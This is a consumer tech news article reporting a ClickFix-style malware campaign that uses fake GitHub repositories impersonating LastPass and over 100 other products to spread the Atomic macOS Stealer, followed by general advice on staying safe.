Over 100 password managers and software solutions are being impersonated by a new malware campaign targeting macOS users to steal their personal information. As reported by Bleeping Computer, the popular password manager LastPass has already started warning users about this malicious software that is being spread through fake GitHub repositories.
Besides impersonating LastPass, this campaign is also pretending to be other password managers and software solutions including 1Password, Dropbox, Gemini, Audacity, Adobe After Effects, and SentinelOne, among more than 100 others. It's using these fake repositories to spread the Atomic macOS Stealer, also known as AMOS, which is an info-stealing malware often used in ClickFix style attacks. AMOS is a malware-as-a-service offering that can be bought by hackers and other cybercriminals for roughly $1,000/month on the dark web and typically targets the data stored on vulnerable computers.
The developers of this malware also recently added a backdoor component which gives them persistent and stealthy access to compromised systems. A large number of these deceptive GitHub repositories have been created from multiple accounts in order to optimize them to rank high in search results and to evade detection. LastPass has reported the fake repositories to GitHub but since it's easy to recreate new ones through automation from new accounts, even if they're taken down, new fraudulent ones could pop up just as quickly.
As ClickFix style attacks, the repositories feature a ‘download;' button that directs users to a secondary website where they are instructed to paste a command into the terminal to perform an installation of what seems to be legitimate software but is in actuality malware. The “ClickFix’ method takes advantage of a target not fully understanding what the commands are doing on their system; in this case the command is performing a curl request to a base64-encoded URL which then downloads an AMOS payload to the /tmp directory.
How to stay safe from ClickFix malware attacks
In order to stay safe from ClickFix style attacks, the most important thing you need to know is not to run commands on your system, especially when you don't understand them. Additionally, when looking for software online, its recommended to only trust official app stores like the Mac App Store or vendor websites while avoiding offshoots. If there isn’t a macOS version of a particular piece of software available on a company's official site, be extra wary when you find a third-party site or in this case, a GitHub page, suggesting there is one.
If you do come across a macOS port of a program you're interested in, you should ensure that it comes from a reputable source that has been vetted by the community first. Still, you are installing it at your own risk, so when in doubt, it's best to wait for an official port.
It also never hurts to have strong protections when online – one of the best antivirus software solutions can keep your Windows PCs protected while the best Mac antivirus software is specifically designed for your Apple computer. These paid solutions also provide you with plenty of extra useful features like web browsers that warn you about suspicious websites and downloads, ransomware rollback, a VPN, and more.
For those who are really worried about getting hacked or having their bank accounts drained by cybercriminals, you can't go wrong with the best identity theft protection services for even more protection. However, you'll need to sign up before a cyberattack or major security incident to take full advantage of the identity theft insurance and other protections these services offer.
ClickFix style attacks have been quite successful recently and until the general public learns to recognize and avoid them, hackers are going to keep using them in their malware campaigns. That's why it's up to you to practice good cyber hygiene and most importantly, to always be careful where you click and what you download.
Follow Tom's Guide on Google News and add us as a preferred source to get our up-to-date news, analysis, and reviews in your feeds. Make sure to click the Follow button!
More from Tom's Guide
- FBI warns hackers are impersonating crime reporting sites to steal your personal data — here’s how to tell
- Google will let you use passkeys automatically in Chrome - here's how you can switch
- Hackers are now using deepfakes in phishing scams to fool banking apps and steal your money - how to stay safe
You must confirm your public display name before commenting
Please logout and then login again, you will then be prompted to enter your display name.
